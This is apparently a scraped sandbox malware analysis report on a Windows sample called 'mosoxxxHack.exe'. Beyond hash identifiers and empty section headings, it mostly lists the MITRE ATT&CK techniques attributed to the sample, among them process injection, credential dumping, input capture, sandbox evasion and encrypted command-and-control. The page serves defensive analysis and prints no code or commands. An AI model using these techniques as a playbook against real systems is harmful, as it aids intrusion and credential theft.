Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7522251b0d7cd3d773ff5ee9c28136693a4658e86eca77a8fa4a3a7db5a6a920
Instruction ID: 477a44ca14a8b952b7a12bcf8563b0fe677f1245782d2df71d561ca8169c4d48
Opcode Fuzzy Hash: 7522251b0d7cd3d773ff5ee9c28136693a4658e86eca77a8fa4a3a7db5a6a920
Instruction Fuzzy Hash: F3D05E3232422057CA14214EA4096AF36DE87C9622F04806BF509C3241CEA58C5567A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report mosoxxxHack.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre